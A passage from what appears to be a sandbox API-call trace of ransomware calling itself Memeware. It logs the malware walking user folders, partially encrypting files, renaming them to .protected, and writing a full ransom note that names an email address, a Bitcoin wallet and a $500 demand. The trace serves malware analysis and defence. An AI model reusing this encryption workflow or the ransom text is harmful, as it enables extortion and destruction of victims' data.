wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.protected") returned 66 [0096.032] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini"), 
lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\desktop.ini.protected" (normalized: "c:\\users\\public\\recorded tv\\sample media\\desktop.ini.protected")) returned 1 [0096.033] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Windows") returned -1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Program Files") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="Program Files (x86)") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="$Recycle.bin") returned 1 [0096.033] lstrcmpiW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="System Volume Information") returned 1 [0096.033] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.033] StrStrIW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".protected") returned 0x0 [0096.033] lstrcmpW (lpString1="win7_scenic-demoshort_raw.wtv", lpString2="RESTORE_FILES.txt") returned 1 [0096.033] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.033] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.033] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample 
Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".txt") returned 0x0 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".rar") returned 0x0 [0096.034] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv") returned 74 [0096.034] StrStrW (lpFirst="win7_scenic-demoshort_raw.wtv", lpSrch=".zip") returned 0x0 [0096.034] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.061] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.061] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0096.062] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.062] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0096.063] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0096.063] CloseHandle (hObject=0xd4) returned 1 [0096.063] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded 
TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.protected") returned 84 [0096.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv.protected" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv.protected")) returned 1 [0096.064] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0096.064] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0096.064] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\RESTORE_FILES.txt") returned 62 [0096.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\Sample Media\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.081] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.081] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0096.082] lstrlenA (lpString="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") returned 684 [0096.082] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0096.082] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.082] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, 
lpOverlapped=0x0) returned 1 [0096.082] CloseHandle (hObject=0xb4) returned 1 [0096.083] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0096.083] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0096.083] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Recorded TV\\RESTORE_FILES.txt") returned 49 [0096.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Recorded TV\\RESTORE_FILES.txt" (normalized: "c:\\users\\public\\recorded tv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0096.085] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0096.085] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0096.086] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0096.086] WriteFile (in: hFile=0xa4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0096.086] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0096.086] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0096.086] CloseHandle (hObject=0xa4) returned 1 [0096.086] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Windows") returned -1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Program Files") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="Program Files (x86)") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="$Recycle.bin") returned 1 [0096.086] lstrcmpiW (lpString1="Videos", lpString2="System Volume Information") returned 1 [0096.086] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos") returned 26 [0096.086] lstrcmpW (lpString1="Videos", lpString2=".") returned 1 [0096.086] lstrcmpW (lpString1="Videos", lpString2="..") returned 1 [0096.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\*") returned 28 [0096.086] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0096.086] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.086] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.086] lstrcmpiW (lpString1=".", 
lpString2="Program Files (x86)") returned -1 [0096.086] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.086] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0096.086] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\.") returned 28 [0096.086] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.087] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.087] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\." (normalized: "c:\\users\\public\\videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.087] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.087] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.087] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\..") returned 29 [0096.087] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.087] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.087] StrStrIW (lpFirst="..", lpSrch=".protected") 
returned 0x0 [0096.087] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\.." (normalized: "c:\\users\\public"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.087] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.087] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.087] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.087] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.087] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.087] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0096.087] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0096.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: 
"c:\\users\\public\\videos\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.088] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini") returned 38 [0096.088] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.089] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0096.089] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x17c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x17c, lpOverlapped=0x0) returned 1 [0096.089] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0096.089] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0096.089] CloseHandle (hObject=0xb4) returned 1 [0096.090] wnsprintfW 
(in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.protected") returned 48 [0096.090] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Videos\\desktop.ini.protected" (normalized: "c:\\users\\public\\videos\\desktop.ini.protected")) returned 1 [0096.091] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Windows") returned -1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Program Files") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="Program Files (x86)") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="$Recycle.bin") returned 1 [0096.091] lstrcmpiW (lpString1="Sample Videos", lpString2="System Volume Information") returned -1 [0096.091] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos") returned 40 [0096.091] lstrcmpW (lpString1="Sample Videos", lpString2=".") returned 1 [0096.091] lstrcmpW (lpString1="Sample Videos", lpString2="..") returned 1 [0096.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*") returned 42 [0096.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x47b9d0 [0096.091] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0096.091] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0096.091] lstrcmpiW (lpString1=".", lpString2="System Volume 
Information") returned -1 [0096.091] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.") returned 42 [0096.091] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.091] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0096.091] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0096.091] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\." (normalized: "c:\\users\\public\\videos\\sample videos\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.092] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0096.092] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0096.092] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0096.092] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\..") returned 43 [0096.092] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.092] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.092] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0096.092] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0096.092] CryptGenRandom 
(in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\.." (normalized: "c:\\users\\public\\videos"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0096.092] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0096.092] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0096.092] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.092] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0096.092] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0096.092] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0096.092] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0096.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini" (normalized: "c:\\users\\public\\videos\\sample videos\\desktop.ini"), dwDesiredAccess=0xc0000000, 
dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0096.093] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini") returned 52 [0096.093] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0096.093] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x146, lpOverlapped=0x0) returned 1 [0096.094] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0096.094] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, 